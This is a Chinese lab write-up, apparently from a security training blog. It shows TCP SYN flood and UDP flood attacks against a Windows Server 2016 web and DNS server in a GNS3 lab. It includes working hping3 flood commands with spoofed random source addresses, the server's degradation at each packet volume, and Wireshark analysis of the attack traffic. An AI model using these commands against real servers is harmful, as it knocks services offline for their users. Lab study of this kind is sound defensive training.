统计
  • 建站日期:2021-03-10
  • 文章总数:32 篇
  • 评论总数:0 条
  • 分类总数:5 个
  • 最后更新:9月13日
文章 渗透测试

逍遥安全网络攻防实验--TCP, UDP Flood 攻击

逍遥子
首页 渗透测试 正文

原理


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第1
张图片


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第2
张图片


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第3
张图片



TCP Flood攻击

配置环境

Windows Server 2016配置
逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第4
张图片

服务器管理器,创建一个Web服务器并开启该服务器功能


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第5
张图片

kali配置

vim /etc/network/interfaces


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第6
张图片

ifup eth0 开启网络

查看Kali ip 信息:
逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第7
张图片

修改路由器信息:

拓扑关系如下所示:


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第8
张图片

GNS 3 中修改路由器 R1:
逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第9
张图片
逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第10
张图片


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第11
张图片

GNS3 中修改Wireshark路径


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第12
张图片



连通性测试:

Windows Server 2016 ping kali:


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第13
张图片

kali ping Windows Server 2016:


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第14
张图片



攻击

此时kali可以正常访问服务器:


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第15
张图片

在Kali Linux上使用 hping3 攻击Windows 2016 Server

hping3 -S(表示SYN Flood攻击) -c 包数量 –-flood(表示以最快速度发送包,并且不显示回复) -d 每个包中数据长度 -w 窗口长度 -p 目标端口号 --rand-source(表示以随机的IP地址发送流量)

在GNS3上服务器网段上打开Wireshark抓包

hping3 -S -c 100 --flood -d 32 -w 64 -p 80 --rand-source 192.168.2.2


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第16
张图片

此时服务器可以正常访问

hping3 -S -c 500 --flood -d 64 -w 128 -p 80 --rand-source 192.168.2.2


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第17
张图片

此时服务器也可以正常访问,但加载时间较长

hping3 -S -c 1000 --flood -d 128 -w 512 -p 80 --rand-source 192.168.2.2


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第18
张图片

此时服务器无法访问,页面无法加载


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第19
张图片



UDP 攻击

创建 DNS 服务器域名到 IP 地址的映射

创建了DNS服务器上www.cybersecurity.com到其IP地址的映射关系:

  1. 新建区域:


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第20
张图片

区域名为 www.cybersecurity.com


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第21
张图片

新建主机:


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第22
张图片

填写ip地址作为该域名的解析地址:


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第23
张图片



win 10 访问域名


win10 网络配置如下:


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第24
张图片

Win10 正常解析出 www.cybersecurity.com的IP地址:


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第25
张图片

Wireshark抓取该过程的UDP报文:


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第26
张图片

Win10请求Windows Server2016 DNS 解析的UDP报文分析:


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第27
张图片

UDP 字段包括:源端口号,目的端口号,报文长度,校验和,时间戳,载荷。

数据段包括请求的选项、查询部分(Queries) ,查询部分包括域名(www.cybersecurity.com),域名长度(Name Length : 21 ),查询类型 (Type: AAAA)

Windows Server 2016的响应报文如下:


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第28
张图片

响应报文中数据段额外包含 Answers 字段:包括对客户端查询的回答(addr 192.168.2.3)、请求到达时间、响应时间



攻击

通过Kali Linux的hping3工具用以下指令攻击Windows2016服务器

hping3 --udp --rand-source -p 53 -d 100 --flood 192.168.2.2


打开真实机上的Wireshark抓取192.168.2.0/24网段的流量,观察并分析攻击时发送的UDP包的特征: UDP 包的源 IP 地址随机,且UDP 包的格式非法(Malformed Packet)


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第29
张图片

攻击UDP 包的具体内容如下:


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第30
张图片

攻击UDP包的特征:

  1. 基于UDP协议,目标端口是 53(DNS 端口)
  2. 源 IP 地址是随机变化的 (--rand - source参数)
  3. “Malformed Packet: DNS”(畸形 DNS 数据包)。因为hping3发送的数据包可能不符合正常的 DNS 数据包格式,目的是通过发送异常数据包来干扰或攻击目标服务器的 DNS 服务。这种畸形数据包可能会导致目标服务器在处理 DNS 请求时出现错误,消耗系统资源来处理这些异常情况。

此时在Windows10上通过nslookup 无法解析出域名


逍遥安全网络攻防实验--TCP,UDPFlood攻击
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第31
张图片


扫描二维码,在手机上阅读


    版权说明
    文章采用: 《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》许可协议授权。
    版权声明:未标注转载均为本站原创,转载时请以链接形式注明文章出处。如有侵权、不妥之处,请联系站长删除。敬请谅解!

    -- 展开阅读全文 --
    逍遥安全网络攻防实验--https 实验
    « 上一篇
    逍遥安全网络攻防实验-ICMP 重定向攻击
    下一篇 »
    为了防止灌水评论,登录后即可评论!

    HI ! 请登录
    注册会员,享受下载全站资源特权。

    最新评论

    标签

    热门文章

    最新文章